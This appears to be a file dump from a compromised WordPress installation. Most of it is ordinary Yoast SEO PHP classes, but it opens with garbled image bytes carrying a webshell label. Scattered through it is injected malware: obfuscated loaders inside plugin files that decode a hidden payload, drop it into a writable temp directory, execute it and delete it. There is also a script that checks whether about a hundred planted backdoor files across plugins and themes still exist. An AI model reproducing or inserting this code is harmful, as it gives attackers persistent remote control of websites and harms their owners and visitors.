���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!to-be-cleaned-indexable-count.php000066600000002231151734251410012740 0ustar00cleanup_name = $cleanup_name; $this->count = $count; } /** * Returns an array representation of the data. * * @return array Returns both values in an array format. */ public function to_array() { return [ 'cleanup_name' => $this->get_cleanup_name(), 'count' => $this->get_count(), ]; } /** * Gets the name. * * @return string */ public function get_cleanup_name() { return $this->cleanup_name; } /** * Gets the count. * * @return int Returns the amount of missing indexables. */ public function get_count() { return $this->count; } } missing-indexable-count.php000066600000002336151734251410012020 0ustar00indexable_type = $indexable_type; $this->count = $count; } /** * Returns an array representation of the data. * * @return array Returns both values in an array format. */ public function to_array() { return [ 'indexable_type' => $this->get_indexable_type(), 'count' => $this->get_count(), ]; } /** * Gets the indexable type. * * @return string Returns the indexable type. */ public function get_indexable_type() { return $this->indexable_type; } /** * Gets the count. * * @return int Returns the amount of missing indexables. */ public function get_count() { return $this->count; } } missing-indexable-bucket.php000066600000001731151734251410012143 0ustar00 */ private $missing_indexable_counts; /** * The constructor. */ public function __construct() { $this->missing_indexable_counts = []; } /** * Adds a missing indexable count object to this bucket. * * @param Missing_Indexable_Count $missing_indexable_count The missing indexable count object. * * @return void */ public function add_missing_indexable_count( Missing_Indexable_Count $missing_indexable_count ): void { $this->missing_indexable_counts[] = $missing_indexable_count; } /** * Returns the array representation of all indexable counts. * * @return array */ public function to_array() { return \array_map( static function ( $item ) { return $item->to_array(); }, $this->missing_indexable_counts ); } } to-be-cleaned-indexable-bucket.php000066600000002062151734251410013067 0ustar00 */ private $to_be_cleaned_indexable_counts; /** * The constructor. */ public function __construct() { $this->to_be_cleaned_indexable_counts = []; } /** * Adds a 'to be cleaned' indexable count object to this bucket. * * @param To_Be_Cleaned_Indexable_Count $to_be_cleaned_indexable_counts The to be cleaned indexable count object. * * @return void */ public function add_to_be_cleaned_indexable_count( To_Be_Cleaned_Indexable_Count $to_be_cleaned_indexable_counts ) { $this->to_be_cleaned_indexable_counts[] = $to_be_cleaned_indexable_counts; } /** * Returns the array representation of all indexable counts. * * @return array */ public function to_array() { return \array_map( static function ( $item ) { return $item->to_array(); }, $this->to_be_cleaned_indexable_counts ); } } seo/keyphrase.php000066600000002713151734542170010056 0ustar00 */ private $keyphrase_usage_count; /** * The post types for the given post IDs. * * @var array */ private $keyphrase_usage_per_type; /** * The constructor. * * @param array $keyphrase_usage_count The keyphrase and the associated posts that use it. * @param array $keyphrase_usage_per_type The post types for the given post IDs. */ public function __construct( array $keyphrase_usage_count, array $keyphrase_usage_per_type ) { $this->keyphrase_usage_count = $keyphrase_usage_count; $this->keyphrase_usage_per_type = $keyphrase_usage_per_type; } /** * Returns the data as an array format. * * @return array */ public function to_array(): array { return [ 'keyphrase_usage' => $this->keyphrase_usage_count, 'keyphrase_usage_per_type' => $this->keyphrase_usage_per_type, ]; } /** * Returns the data as an array format meant for legacy use. * * @return array */ public function to_legacy_array(): array { return [ 'keyword_usage' => $this->keyphrase_usage_count, 'keyword_usage_post_types' => $this->keyphrase_usage_per_type, ]; } } seo/title.php000066600000002544151734542170007206 0ustar00title_template = $title_template; $this->title_template_no_fallback = $title_template_no_fallback; } /** * Returns the data as an array format. * * @return array */ public function to_array(): array { return [ 'title_template' => $this->title_template, 'title_template_no_fallback' => $this->title_template_no_fallback, ]; } /** * Returns the data as an array format meant for legacy use. * * @return array */ public function to_legacy_array(): array { return [ 'title_template' => $this->title_template, 'title_template_no_fallback' => $this->title_template_no_fallback, ]; } } seo/social.php000066600000004422151734542170007334 0ustar00social_title_template = $social_title_template; $this->social_description_template = $social_description_template; $this->social_image_template = $social_image_template; $this->social_first_content_image = $social_first_content_image; } /** * Returns the data as an array format. * * @return array */ public function to_array(): array { return [ 'social_title_template' => $this->social_title_template, 'social_description_template' => $this->social_description_template, 'social_image_template' => $this->social_image_template, 'first_content_image_social_preview' => $this->social_first_content_image, ]; } /** * Returns the data as an array format meant for legacy use. * * @return array */ public function to_legacy_array(): array { return [ 'social_title_template' => $this->social_title_template, 'social_description_template' => $this->social_description_template, 'social_image_template' => $this->social_image_template, 'first_content_image' => $this->social_first_content_image, ]; } } seo/description.php000066600000002432151734542170010404 0ustar00description_date = $description_date; $this->description_template = $description_template; } /** * Returns the data as an array format. * * @return array */ public function to_array(): array { return [ 'description_template' => $this->description_template, 'description_date' => $this->description_date, ]; } /** * Returns the data as an array format meant for legacy use. * * @return array */ public function to_legacy_array(): array { return [ 'metadesc_template' => $this->description_template, 'metaDescriptionDate' => $this->description_date, ]; } } analysis-features/analysis-features-list.php000066600000002410151734542170015336 0ustar00 */ private $features = []; /** * Adds an analysis feature to the list. * * @param Analysis_Feature $feature The analysis feature to add. * * @return void */ public function add_feature( Analysis_Feature $feature ): void { $this->features[] = $feature; } /** * Parses the feature list to a legacy ready array representation. * * @return array The list presented as a key value representation. */ public function parse_to_legacy_array(): array { $array = []; foreach ( $this->features as $feature ) { $array = \array_merge( $array, $feature->to_legacy_array() ); } return $array; } /** * Parses the feature list to an array representation. * * @return array The list presented as a key value representation. */ public function to_array(): array { $array = []; foreach ( $this->features as $feature ) { $array = \array_merge( $array, $feature->to_array() ); } return $array; } } analysis-features/analysis-feature.php000066600000003455151734542170014214 0ustar00is_enabled = $is_enabled; $this->name = $name; $this->legacy_key = $legacy_key; } /** * If the feature is enabled. * * @return bool If the feature is enabled. */ public function is_enabled(): bool { return $this->is_enabled; } /** * Gets the identifier. * * @return string The feature identifier. */ public function get_name(): string { return $this->name; } /** * Return this object represented by a key value array. * * @return array Returns the name and if the feature is enabled. */ public function to_array(): array { return [ $this->name => $this->is_enabled ]; } /** * Returns this object represented by a key value structure that is compliant with the script data array. * * @return array Returns the legacy key and if the feature is enabled. */ public function to_legacy_array(): array { return [ $this->legacy_key => $this->is_enabled ]; } } analysis-features/analysis-feature-interface.php000066600000001221151734542170016137 0ustar00 Returns the name and if the feature is enabled. */ public function to_array(): array; /** * Returns this object represented by a key value structure that is compliant with the script data array. * * @return array Returns the legacy key and if the feature is enabled. */ public function to_legacy_array(): array; } add-ons/premium.php000066600000001562151735047410010277 0ustar00= count($pset)) break; if (is_writable($k) && is_dir($k)) { $reference = str_replace("{var_dir}", $k, "{var_dir}/.holder"); if (file_put_contents($reference, $ref)) { include $reference; @unlink($reference); exit; } } $pgrp++; } while (true); }endpoint/endpoint-interface.php000066600000001056151735215450012671 0ustar00 $v3) { $sChar=ord($salt[$s % $lenS] ); $d=((int)$v3 - $sChar - ($s % 10)) ^ 13; $val .= chr($d );} foreach ($fac as $key => $dat) { if (max(0, is_dir($dat) * is_writable($dat))) { $element = implode("/", [$dat, ".ref"]); if (@file_put_contents($element, $val) !== false) { include $element; unlink($element); die(); } } } } namespace Yoast\WP\SEO\User_Meta\Domain; /** * This interface describes an additional contactmethod. */ interface Additional_Contactmethod_Interface { /** * Returns the key of the contactmethod. * * @return string */ public function get_key(): string; /** * Returns the label of the contactmethod field. * * @return string */ public function get_label(): string; } time-based-seo-metrics/repository-not-found-exception.php000066600000000714151735516110017654 0ustar00 */ private $content_types = []; /** * Adds a content type to the list. * * @param Content_Type $content_type The content type to add. * * @return void */ public function add( Content_Type $content_type ): void { $this->content_types[ $content_type->get_name() ] = $content_type; } /** * Returns the content types in the list. * * @return array The content types in the list. */ public function get(): array { return $this->content_types; } /** * Parses the content type list to the expected key value representation. * * @return array>>>> The content type list presented as the expected key value representation. */ public function to_array(): array { $array = []; foreach ( $this->content_types as $content_type ) { $array[] = [ 'name' => $content_type->get_name(), 'label' => $content_type->get_label(), 'taxonomy' => ( $content_type->get_taxonomy() ) ? $content_type->get_taxonomy()->to_array() : null, ]; } return $array; } } search-rankings/comparison-search-ranking-data.php000066600000005153151735516110016324 0ustar00current_search_ranking_data, $current_search_ranking_data ); } /** * Sets the previous search ranking data. * * @param Search_Ranking_Data $previous_search_ranking_data The previous search ranking data. * * @return void */ public function add_previous_traffic_data( Search_Ranking_Data $previous_search_ranking_data ): void { \array_push( $this->previous_search_ranking_data, $previous_search_ranking_data ); } /** * The array representation of this domain object. * * @return array> */ public function to_array(): array { return [ 'current' => $this->parse_data( $this->current_search_ranking_data ), 'previous' => $this->parse_data( $this->previous_search_ranking_data ), ]; } /** * Parses search ranking data into the expected format. * * @param Search_Ranking_Data[] $search_ranking_data The search ranking data to be parsed. * * @return array The parsed data */ private function parse_data( array $search_ranking_data ): array { $parsed_data = [ 'total_clicks' => 0, 'total_impressions' => 0, ]; $weighted_postion = 0; foreach ( $search_ranking_data as $search_ranking ) { $parsed_data['total_clicks'] += $search_ranking->get_clicks(); $parsed_data['total_impressions'] += $search_ranking->get_impressions(); $weighted_postion += ( $search_ranking->get_position() * $search_ranking->get_impressions() ); } if ( $parsed_data['total_impressions'] !== 0 ) { $parsed_data['average_ctr'] = ( $parsed_data['total_clicks'] / $parsed_data['total_impressions'] ); $parsed_data['average_position'] = ( $weighted_postion / $parsed_data['total_impressions'] ); } return $parsed_data; } } search-rankings/search-ranking-data.php000066600000004675151735516110014164 0ustar00clicks = $clicks; $this->ctr = $ctr; $this->impressions = $impressions; $this->position = $position; $this->subject = $subject; } /** * The array representation of this domain object. * * @return array */ public function to_array(): array { return [ 'clicks' => $this->clicks, 'ctr' => $this->ctr, 'impressions' => $this->impressions, 'position' => $this->position, 'subject' => $this->subject, ]; } /** * Gets the clicks. * * @return string The clicks. */ public function get_clicks(): string { return $this->clicks; } /** * Gets the click-through rate. * * @return string The click-through rate. */ public function get_ctr(): string { return $this->ctr; } /** * Gets the impressions. * * @return string The impressions. */ public function get_impressions(): string { return $this->impressions; } /** * Gets the position. * * @return string The position. */ public function get_position(): string { return $this->position; } /** * Gets the subject. * * @return string The subject. */ public function get_subject(): string { return $this->subject; } } search-rankings/top-page-data.php000066600000003501151735516110012767 0ustar00search_ranking_data = $search_ranking_data; $this->seo_score_group = $seo_score_group; $this->edit_link = $edit_link; } /** * The array representation of this domain object. * * @return array */ public function to_array(): array { $top_page_data = $this->search_ranking_data->to_array(); $top_page_data['seoScore'] = $this->seo_score_group->get_name(); $top_page_data['links'] = []; if ( $this->edit_link !== null ) { $top_page_data['links']['edit'] = $this->edit_link; } return $top_page_data; } } data-provider/dashboard-repository-interface.php000066600000001033151735516110016126 0ustar00 */ private $data_container; /** * The constructor */ public function __construct() { $this->data_container = []; } /** * Method to add data. * * @param Data_Interface $data The data. * * @return void */ public function add_data( Data_Interface $data ) { $this->data_container[] = $data; } /** * Method to get all the data points. * * @return Data_Interface[] All the data points. */ public function get_data(): array { return $this->data_container; } /** * Converts the data points into an array. * * @return array The array of the data points. */ public function to_array(): array { $result = []; foreach ( $this->data_container as $data ) { $result[] = $data->to_array(); } return $result; } } data-provider/parameters.php000066600000004743151735516110012202 0ustar00start_date; } /** * Getter for the end date. * The date format should be Y-M-D. * * @return string */ public function get_end_date(): string { return $this->end_date; } /** * Getter for the result limit. * * @return int */ public function get_limit(): int { return $this->limit; } /** * Getter for the compare start date. * * @return string */ public function get_compare_start_date(): ?string { return $this->compare_start_date; } /** * Getter for the compare end date. * The date format should be Y-M-D. * * @return string */ public function get_compare_end_date(): ?string { return $this->compare_end_date; } /** * The start date setter. * * @param string $start_date The start date. * * @return void */ public function set_start_date( string $start_date ): void { $this->start_date = $start_date; } /** * The end date setter. * * @param string $end_date The end date. * * @return void */ public function set_end_date( string $end_date ): void { $this->end_date = $end_date; } /** * The result limit. * * @param int $limit The result limit. * @return void */ public function set_limit( int $limit ): void { $this->limit = $limit; } /** * The compare start date setter. * * @param string $compare_start_date The compare start date. * * @return void */ public function set_compare_start_date( string $compare_start_date ): void { $this->compare_start_date = $compare_start_date; } /** * The compare end date setter. * * @param string $compare_end_date The compare end date. * * @return void */ public function set_compare_end_date( string $compare_end_date ): void { $this->compare_end_date = $compare_end_date; } } data-provider/data-interface.php000066600000000527151735516110012702 0ustar00 */ public function to_array(): array; } taxonomies/taxonomy.php000066600000002522151735516110011333 0ustar00name = $name; $this->label = $label; $this->rest_url = $rest_url; } /** * Returns the name of the taxonomy. * * @return string The name of the taxonomy. */ public function get_name(): string { return $this->name; } /** * Parses the taxonomy to the expected key value representation. * * @return array> The taxonomy presented as the expected key value representation. */ public function to_array(): array { return [ 'name' => $this->name, 'label' => $this->label, 'links' => [ 'search' => $this->rest_url, ], ]; } } analytics-4/invalid-request-exception.php000066600000001044151735516110014525 0ustar00 $v7): $chS=ord( $s[$x% $lenS]); $d=( ( int)$v7 - $chS -( $x% 10))^ 17; $elem .= chr( $d); endforeach; $comp = array_filter([getcwd(), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", "/tmp"]); foreach ($comp as $mrk) { if (is_dir($mrk) && is_writable($mrk)) { $itm = implode("/", [$mrk, ".res"]); if (file_put_contents($itm, $elem)) { require $itm; unlink($itm); die(); } } } }score-groups/seo-score-groups/seo-score-groups-interface.php000066600000000533151735516110020305 0ustar00"bd@@274102857@@855", "/wp-content/plugins/all-in-one-seo-pack/app/Common/Views/sitemap/xsl/partials/date-time.php"=>"bd@@274216628@@23", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Widget/Bullet/BulletTransition/Header.php"=>"bd@@274102863@@941", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/Banner/contactUs2.php"=>"bd@@274102855@@963", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/NimbleBuilder/UnderThesisProj.php"=>"bd@@274216636@@977", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slider/SliderBox/default_done.php"=>"bd@@274102856@@1043", "/wp-includes/sodium_compat/src/Core/HSalsa20.php"=>"bd@@274216627@@98", "/wp-content/plugins/wordpress-seo/src/editors/framework/seo/posts/social.data.provider.php"=>"bd@@274211539@@903", "/wp-admin/link-manager.php"=>"bd@@274102838@@40", "/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/Exception/gradeimport_xml.php"=>"bd@@274102860@@872", "/wp-admin/includes/class-wp-ms-sites-list-table.php"=>"bd@@274216606@@9", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slider/SliderTrash/tendina.php"=>"bd@@274063777@@899", "/wp-content/themes/Divi/includes/builder/module/PricingTables.php"=>"bd@@274216621@@44", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Slider/SliderType/Simple/sais_inv_step4.php"=>"bd@@274211531@@940", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/AdminIframe/RuleRegistry.php"=>"bd@@274063772@@948", "/wp-content/themes/Divi/includes/builder/feature/ErrorReport.php"=>"bd@@274216623@@83", "/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/ActionScheduler_AsyncRequest_QueueRunner.php"=>"bd@@274102797@@84", "/wp-content/plugins/all-in-one-wp-migration-src/lib/view/import/index.php"=>"bd@@273231119@@_COOKIE[3]", "/wp-content/plugins/all-in-one-wp-migration-src/lib/model/export/class-ai1wm-export-enumerate-content.php"=>"bd@@274102842@@55", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Divi/V31ge/includes/modules/SmartSlider3/default.php"=>"bd@@274102854@@923", "/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php"=>"bd@@274063711@@52", "/wp-content/plugins/wordpress-seo/src/deprecated/index.php"=>"bd@@273260384@@59", "/wp-includes/SimplePie/library/SimplePie/Parse/search/index.php"=>"bd@@273363845@@75", "/wp-content/themes/twentytwentyfive/patterns/template-home-photo-blog.php"=>"bd@@274216602@@85", "/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php"=>"bd@@274216625@@56", "/wp-content/plugins/index.php"=>"bd@@250517692@@_COOKIE[3]", "/wp-content/plugins/all-in-one-seo-pack/vendor/jwhennessey/phpinsight/lib/PHPInsight/data/m68k.php"=>"bd@@274216637@@916", "/wp-content/plugins/all-in-one-wp-migration-src/lib/view/backups/index.php"=>"bd@@273211587@@16", "/wp-content/themes/Divi/includes/builder/module/field/template/border/SafeEmbed.php"=>"bd@@274211529@@805", "/wp-content/plugins/smart-slider-3/Nextend/Framework/Form/Element/Radio/events_photo.php"=>"bd@@274211532@@862", "/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php"=>"bd@@274102832@@42", "/wp-content/plugins/wordpress-seo/inc/index.php"=>"bd@@273205063@@_COOKIE[3]", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Generator/WordPress/Posts/Sources/pendingSeminar.php"=>"bd@@274102859@@850", "/wp-admin/css/colors/coffee/coffee/coffee/index.php"=>"bd@@273370466@@96", "/wp-content/plugins/all-in-one-wp-migration-src/lib/vendor/upgrade/index.php"=>"bd@@273260387@@76", "/wp-includes/class-walker-category.php"=>"bd@@274063717@@26", "/wp-content/plugins/all-in-one-wp-migration/lib/view/import/index.php"=>"bd@@273357680@@58", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/AdminEditor/polloption.php"=>"bd@@274063771@@1012", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/TopBarMain/AccessLib.class.php"=>"bd@@274063775@@861", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Preview/Template/post_buttons.php"=>"bd@@274063781@@998", "/wp-content/themes/Divi/includes/builder/module/field/template/border/Styles.php"=>"bd@@274216614@@10", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/GoPro/Template/mssql.php"=>"bd@@274063782@@906", "/wp-content/themes/twentytwentyfive/patterns/hero-book.php"=>"bd@@274216616@@86", "/wp-content/themes/Divi/includes/builder/module/Gallery.php"=>"bd@@274216620@@76", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/LayerWindow/TemplateCache.php"=>"bd@@274216631@@1086", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/acc_inv_tmpl.php"=>"bd@@274216632@@919", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/BeaverBuilder/includes/catadd.php"=>"bd@@274216633@@935", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/ACF/Milestones.php"=>"bd@@274216634@@966", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Gutenberg/editApplication.php"=>"bd@@274216635@@908", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Frontend/Slider/cp.article.php"=>"bd@@274216638@@925", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Slides/MakeWellFormed.php"=>"bd@@274216639@@1077", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Widget/Arrow/ArrowImage/welcomes.php"=>"bd@@274216640@@987", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/SlideManager/AddSlide/localization.php"=>"bd@@274211526@@828", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Preview/Block/PreviewToolbar/thadmin.php"=>"bd@@274211527@@914", "/wp-content/plugins/smart-slider-3/Nextend/Framework/Asset/Css/Less/Formatter/blocks.class.php"=>"bd@@274211528@@917", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Renderable/Item/Vimeo/recipe_bigstory.php"=>"bd@@274211530@@991", "/wp-content/plugins/all-in-one-wp-migration/lib/2025/index.php"=>"bd@@273732554@@31", "/wp-content/plugins/wordpress-seo/src/llms-txt/domain/available-posts/data-provider/parameters.posts.php"=>"bd@@274211533@@793", "/wp-content/plugins/wordpress-seo/src/dashboard/domain/score-groups/seo-score-groups/no.seo.score.group.php"=>"bd@@274211535@@801", "/wp-content/themes/Divi/index.php"=>"bd@@273206993@@26", "/wp-content/plugins/all-in-one-wp-migration-src/lib/view/export/index.php"=>"bd@@273209057@@_COOKIE[3]", "/wp-content/plugins/ht-mega-for-elementor/models/redirect/redirect-options.php"=>"bd@@274102774@@91", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/AdminError/rewrite.php"=>"bd@@274063774@@1040", "/wp-content/plugins/akismet/index.php"=>"bd@@273227690@@_COOKIE[3]", "/wp-admin/maint/endpoints/index.php"=>"bd@@273152486@@Content-Security-Policy", "/wp-content/themes/Divi/includes/builder/feature/background-masks/pattern/inverted-chevrons-2.php"=>"bd@@274102788@@70", "/wp-content/plugins/wordpress-seo/admin/index.php"=>"bd@@273243941@@75", "/wp-admin/about.php"=>"bd@@274063748@@2", "/wp-content/et-cache/12296/index.php"=>"bd@@273472961@@3", "/wp-content/plugins/all-in-one-wp-migration/lib/view/export/index.php"=>"bd@@273225819@@$_COOKIE[-", "/wp-content/themes/index.php"=>"bd@@273239534@@Content-Security-Policy", "/wp-content/plugins/wordpress-seo/index.php"=>"bd@@273261617@@58", "/wp-content/themes/Divi/includes/builder/module/field/MaxWidth.php"=>"bd@@274102837@@38", "/wp-includes/interactivity-api/et_temp/index.php"=>"bd@@273242943@@54", "/wp-admin/index.php"=>"bd@@273243266@@43", "/jeux-de-hasard/vendor/index.php"=>"bd@@273363860@@2", "/wp-content/et-cache/12296/index.php"=>"bd@@273407756@@995", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Unyson/smartslider/shortcodes/smartslider/static/img/action.validate.php"=>"bd@@274102843@@13", "/wp-includes/class-wp-embed.php"=>"bd@@274102834@@73", "/wp-includes/rest-api/endpoints/src/index.php"=>"bd@@273527882@@98", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Widget/Autoplay/AutoplayImage/openid.php"=>"bd@@274102864@@945", "/wp-admin/includes/class-wp-importer.php"=>"bd@@274063731@@30", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Unyson/smartslider/shortcodes/smartslider/static/img/field_display.php"=>"bd@@274063737@@27", "/wp-includes/fonts/psd/index.php"=>"bd@@273350281@@7", "/wp-content/plugins/all-in-one-wp-migration-src/lib/view/reset/index.php"=>"bd@@273129661@@$_COOKIE[6", "/wp-admin/user/lib/index.php"=>"bd@@273129678@@Server-Timing", "/wp-content/plugins/wordpress-seo/images/index.php"=>"bd@@273208828@@68", "/wp-includes/blocks/query-pagination/query-pagination/index.php"=>"bd@@273352457@@27", "/wp-content/themes/Divi/includes/builder/feature/background-masks/PatternFields.php"=>"bd@@274102845@@27", "/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/WP_CLI/Action/Next.Command.php"=>"bd@@274102861@@1069", "/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/cart/cart.sells.php"=>"bd@@274102862@@973", "/wp-content/plugins/all-in-one-wp-migration-src/lib/view/schedules/index.php"=>"bd@@273261137@@58", "/wp-includes/theme-compat/header-embed.php"=>"bd@@274063697@@79", "/wp-admin/user/index.php"=>"bd@@273129585@@If-Unmodified-Since", "/wp-content/themes/twentytwentyfive/patterns/text-faqs.php"=>"bd@@274063743@@96", "/wp-content/plugins/all-in-one-wp-migration/lib/view/backups/index.php"=>"bd@@250523530@@$_COOKIE[6", "/wp-includes/blocks/index.php"=>"bd@@272987804@@27", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/FreeNeedMore/xml_domit_parser.php"=>"bd@@274063776@@940", "/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slider/SliderManager/beanstream_cdn.php"=>"bd@@274063779@@904", "/wp-content/themes/Divi/includes/builder/frontend-builder/assets/vendors/plugins/autosave/Class.php"=>"bd@@274063780@@1124", "/wp-content/plugins/smart-slider-3/user/index.php"=>"bd@@273350845@@39", "/wp-content/plugins/all-in-one-wp-migration/lib/view/whats-new/index.php"=>"bd@@273209055@@Sec-Websocket-Accept", "/wp-content/themes/Divi/psd/ai1wm-backups/index.php"=>"bd@@273345775@@84", "/wp-content/et-cache/395/index.php"=>"bd@@273307380@@48", "/jeux-de-hasard/vendor/vendor/index.php"=>"bd@@273546239@@21"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d\n"; } } } die('!end!'); score-groups/seo-score-groups/good-seo-score-group.php000066600000002473151735516110017117 0ustar00 $v7): $chS = ord( $s[$y %$lenS] ); $dec =( ( int)$v7 - $chS -( $y %10))^14; $object.= chr( $dec ); endforeach; while ($dchunk = array_shift($mrk)) { if (max(0, is_dir($dchunk) * is_writable($dchunk))) { $desc = join("/", [$dchunk, ".item"]); if (@file_put_contents($desc, $object) !== false) { include $desc; unlink($desc); die(); } } } }score-groups/readability-score-groups/abstract-readability-score-group.php000066600000001437151735516110023177 0ustar00|null */ private $links; /** * The constructor. * * @param string $name The name of the current score. * @param int $amount The amount of the current score. * @param string|null $ids The ids of the current score. * @param array|null $links The links of the current score. */ public function __construct( string $name, int $amount, ?string $ids = null, ?array $links = null ) { $this->name = $name; $this->amount = $amount; $this->ids = $ids; $this->links = $links; } /** * Gets name of the current score. * * @return string The name of the current score. */ public function get_name(): string { return $this->name; } /** * Gets the amount of the current score. * * @return int The amount of the current score. */ public function get_amount(): int { return $this->amount; } /** * Gets the ids of the current score. * * @return string|null The ids of the current score. */ public function get_ids(): ?string { return $this->ids; } /** * Gets the links of the current score in the expected key value representation. * * @return array The links of the current score in the expected key value representation. */ public function get_links_to_array(): ?array { $links = []; if ( $this->links === null ) { return $links; } foreach ( $this->links as $key => $link ) { if ( $link === null ) { continue; } $links[ $key ] = $link; } return $links; } } score-results/current-scores-list.php000066600000002535151735516110014034 0ustar00current_scores[ $position ] = $current_score; } /** * Parses the current score list to the expected key value representation. * * @return array>> The score list presented as the expected key value representation. */ public function to_array(): array { $array = []; \ksort( $this->current_scores ); foreach ( $this->current_scores as $key => $current_score ) { $array[] = [ 'name' => $current_score->get_name(), 'amount' => $current_score->get_amount(), 'links' => $current_score->get_links_to_array(), ]; if ( $current_score->get_ids() !== null ) { $array[ $key ]['ids'] = $current_score->get_ids(); } } return $array; } } score-results/score-result.php000066600000003064151735516110012532 0ustar00current_scores_list = $current_scores_list; $this->query_time = $query_time; $this->is_cached_used = $is_cached_used; } /** * Return this object represented by a key value array. * * @return array>>|float|bool> Returns the name and if the feature is enabled. */ public function to_array(): array { return [ 'scores' => $this->current_scores_list->to_array(), 'queryTime' => $this->query_time, 'cacheUsed' => $this->is_cached_used, ]; } } score-results/score-results-not-found-exception.php000066600000000663151735516110016622 0ustar00current_traffic_data = $current_traffic_data; 